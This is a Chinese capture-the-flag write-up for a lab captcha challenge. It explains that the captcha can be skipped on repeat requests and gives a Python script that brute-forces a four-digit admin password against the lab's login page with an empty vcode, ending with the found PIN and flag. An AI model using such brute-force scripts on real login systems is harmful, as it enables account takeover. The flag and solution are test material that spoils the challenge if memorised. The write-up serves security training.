原题

逗比验证码第二期
分值: 150
验证便失效的验证码

分析

在上一个题目中，验证码因为没有提交一次就失效，所以导致了重复提交问题，这一次，专门做了验证一次就失效。 但成功后，再次提交发现不用再填vcode了 （可以通过burp 截获并repeater 发送的方法来监测），发现这个问题后，写脚本攻击即可。

image.png

import requests
import json


import sys
proxies = {
#  "http": "http://127.0.0.1:8080",
}
u = "http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php"

for i in range(1000,9999):

    data = {'username': 'admin',"pwd":i,"submit":"submit","vcode":""}
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0',
        'Cookie': 'PHPSESSID=7cd8b0e523175abdbab539685b9b6251'
    }
    r = requests.post(u, data=data,headers=headers,proxies=proxies)
    r.encoding = 'utf-8' 

    html = r.text.encode('utf-8', 'ignore')
    if html.find('error')>=0:
        print "I= ",  i, ' ',html
        sys.stdout.flush()
    else:
        print 'i= '+str(i)
        print html
        break

最后找到了key
i= 1228
key is LJLJL789ss33fasvxcvsdf#@sd